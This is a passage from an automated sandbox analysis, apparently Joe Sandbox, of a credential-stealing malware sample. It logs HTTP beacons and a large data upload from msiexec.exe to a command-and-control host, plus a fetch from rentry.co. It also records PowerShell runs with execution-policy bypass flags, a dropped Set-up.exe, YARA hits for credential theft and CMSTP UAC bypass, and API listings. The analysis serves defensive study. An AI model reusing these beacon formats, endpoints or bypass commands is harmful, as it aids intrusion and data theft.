                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDfhFkFvw5WdbXqZ3jXy0AfJ%2BJA3V%2BlqWl8E1YZtN1VD4kvWLrnfq15IGgwEDL3S%2FOzAqGdj22TcNkHNTSUHWYxgCVld5v1%2FzForVV4CYd3QT1JjP02lzKYf9edoykr%2BUU7H"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c226ef9f43c7-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21345&delivery_rate=1703617&cwnd=211&unsent_bytes=0&cid=05e73be206d2a731&ts=910&x=0"
2024-11-25 09:54:38 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-25 09:54:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:40 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=3JYEH0QNJIX
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1215
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:40 UTC1215OUTData Raw: 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f
                                                                                            Data Ascii: --3JYEH0QNJIXContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--3JYEH0QNJIXContent-Disposition: form-data; name="pid"1--3JYEH0QNJIXContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--3JYEH0QNJIXCo
2024-11-25 09:54:42 UTC | 1011 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=usn73jji1mm0jg0ngdino6s9ei; expires=Fri, 21-Mar-2025 03:41:20 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TmeW02DrXReovbQfXgTN%2FrtNXK9SHFC5qmgwUfMg4C9B8ydpv7dMGQK5HeNfa0y1Z08CzXz%2FHgWxKMRg8RXKb0hdwCMFZv18E9uE2sY6JGJ4YZ%2FmEOPnnH%2Fto9DyHjPwAO2A"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c23dde534241-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4499&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2125&delivery_rate=1626740&cwnd=216&unsent_bytes=0&cid=4391fc7fe9fee188&ts=1922&x=0"
2024-11-25 09:54:42 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-25 09:54:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:44 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=TEDY2270QJS4
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 553634
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34
                                                                                            Data Ascii: --TEDY2270QJS4Content-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--TEDY2270QJS4Content-Disposition: form-data; name="pid"1--TEDY2270QJS4Content-Disposition: form-data; name="lid"MeHdy4--pl8vs06--TEDY2270QJS4
2024-11-25 09:54:46 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=5hj6omggea4tf6ofgmvjlucjv6; expires=Fri, 21-Mar-2025 03:41:25 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9eTftDTubNcwQsl8gzdib64QjYeaG%2BVH3EJtVOEjINHz0VwIh4c4ltWGszVGuD2TO5RFjr55RzRXLUGGqsQjkKJqFseARVKdik0CWqK9f6agEExbUhjyoMZyT%2BmC28vkHIlg"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c25528bf4406-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1704&sent=341&recv=575&lost=0&retrans=0&sent_bytes=2840&recv_bytes=556131&delivery_rate=1656267&cwnd=186&unsent_bytes=0&cid=8889e18d10d18cae&ts=2280&x=0"


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            7 | 192.168.2.4 | 49755 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-11-25 09:54:48 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 84
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:48 UTC | 84 | OUT | Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl8vs06&j=&hwid=58A2268A4217FF4823A7FDDC95B3C36A
                                                                                            2024-11-25 09:54:48 UTC | 1005 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=q3hnhtpm3kfu49ak92od0od0ft; expires=Fri, 21-Mar-2025 03:41:27 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrFAl5iVkMgER0PdBX0Iq4KQu%2B1SsBV1dWmDMNLZJ5VGSYg7KnqVc4ZO5B19qWFUHTan6hd4MPjHv3bmKJHHgS0%2BDCTXIJJ7HnjDAY6LLgJiMGqL6EncZIbD84accHQjcutU"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c26bf9578c36-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=984&delivery_rate=1450571&cwnd=162&unsent_bytes=0&cid=a6f851d992af0723&ts=732&x=0"
                                                                                            2024-11-25 09:54:48 UTC126INData Raw: 37 38 0d 0a 6a 53 6b 32 4d 4b 56 42 41 73 6e 32 77 6f 4a 75 31 6c 51 4a 46 50 30 65 30 66 61 73 45 55 4b 41 4a 46 57 33 42 4d 44 70 59 78 48 57 55 68 52 46 68 33 73 67 6f 59 4b 32 38 68 33 73 43 43 5a 49 30 6d 79 30 6d 4e 68 6a 4f 36 35 48 4f 75 73 72 70 6f 77 4d 5a 4f 68 65 55 77 58 35 62 6e 43 6f 67 65 43 75 54 4c 41 67 4b 79 37 50 4d 76 4f 54 6a 69 74 79 2f 58 6b 3d 0d 0a
                                                                                            Data Ascii: 78jSk2MKVBAsn2woJu1lQJFP0e0fasEUKAJFW3BMDpYxHWUhRFh3sgoYK28h3sCCZI0my0mNhjO65HOusrpowMZOheUwX5bnCogeCuTLAgKy7PMvOTjity/Xk=
                                                                                            2024-11-25 09:54:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            8 | 192.168.2.4 | 49761 | 172.67.75.40 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-11-25 09:54:50 UTC | 196 | OUT | GET /feouewe5/raw HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Host: rentry.co
                                                                                            2024-11-25 09:54:50 UTC | 1279 | IN | HTTP/1.1 403 Forbidden
                                                                                            Date: Mon, 25 Nov 2024 09:54:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 8771
                                                                                            Connection: close
                                                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                            Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Resource-Policy: same-origin
                                                                                            Origin-Agent-Cluster: ?1
                                                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                            Referrer-Policy: same-origin
                                                                                            X-Content-Options: nosniff
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            cf-mitigated: challenge


                                                                                            Target ID:0
                                                                                            Start time:04:53:42
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1"
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:04:53:42
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:04:54:07
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                                                                                            Imagebase:0x7e0000
                                                                                            File size:6'487'736 bytes
                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:04:54:13
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                            Imagebase:0x420000
                                                                                            File size:24'576 bytes
                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:04:54:13
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:04:54:16
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                                                                                            Imagebase:0x7e0000
                                                                                            File size:6'487'736 bytes
                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:04:54:21
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Imagebase:0xdf0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2177293553.0000000003427000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2238461589.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2199449864.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2238430241.0000000003428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2226006098.0000000003424000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2351954654.0000000005194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2152637778.0000000003428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2199967273.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2152329165.0000000003425000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:04:54:22
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                            Imagebase:0x420000
                                                                                            File size:24'576 bytes
                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2192626392.0000000004397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:04:54:23
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:04:54:24
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                                                                                            Imagebase:0x7e0000
                                                                                            File size:6'487'736 bytes
                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2162484499.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:04:54:30
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Imagebase:0xdf0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2192707284.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:04:54:49
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1"
                                                                                            Imagebase:0x200000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:04:54:49
                                                                                            Start date:25/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                              Execution Graph

                                                                                              Execution Coverage:0.1%
                                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                                              Signature Coverage:1.5%
                                                                                              Total number of Nodes:200
                                                                                              Total number of Limit Nodes:3

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • malloc.MSVCR100(?), ref: 6BB602CC
                                                                                                • Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • _callnewh.MSVCR100(?), ref: 6BB8F2B0
                                                                                              • std::exception::exception.LIBCMT(?,00000001), ref: 6BB8F2E7
                                                                                              • atexit.MSVCR100(6BBFFC34,?,00000001), ref: 6BB8F2F7
                                                                                              • std::exception::exception.LIBCMT(6BC07580), ref: 6BB8F301
                                                                                              • _CxxThrowException.MSVCR100(?,6BB6BDD8,6BC07580), ref: 6BB8F312
                                                                                              • _errno.MSVCR100 ref: 6BB8F321
                                                                                              • _errno.MSVCR100 ref: 6BB8F32E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errnostd::exception::exception$AllocateExceptionHeapThrow_callnewhatexitmalloc
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 903262172-2104205924
                                                                                              • Opcode ID: 99154cb0b59ed6009591a82716f68f58311ea221241410986b03747919e4aa3f
                                                                                              • Instruction ID: 06e1a486cb5e64fc0edb330672b342f087aae96a2fedb1b9e5113cb4453c5dee
                                                                                              • Opcode Fuzzy Hash: 99154cb0b59ed6009591a82716f68f58311ea221241410986b03747919e4aa3f
                                                                                              • Instruction Fuzzy Hash: DC018075901699AACB19DB76C88269D7BB4EF412C8F540499E820E6180FF798E01EBA0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 6BB8F22F
                                                                                              • __NMSG_WRITE.LIBCMT ref: 6BB8F236
                                                                                              • _callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001), ref: 6BB8F255
                                                                                              • _callnewh.MSVCR100(00000001,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BB8F278
                                                                                              • _errno.MSVCR100(00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9), ref: 6BB8F27E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
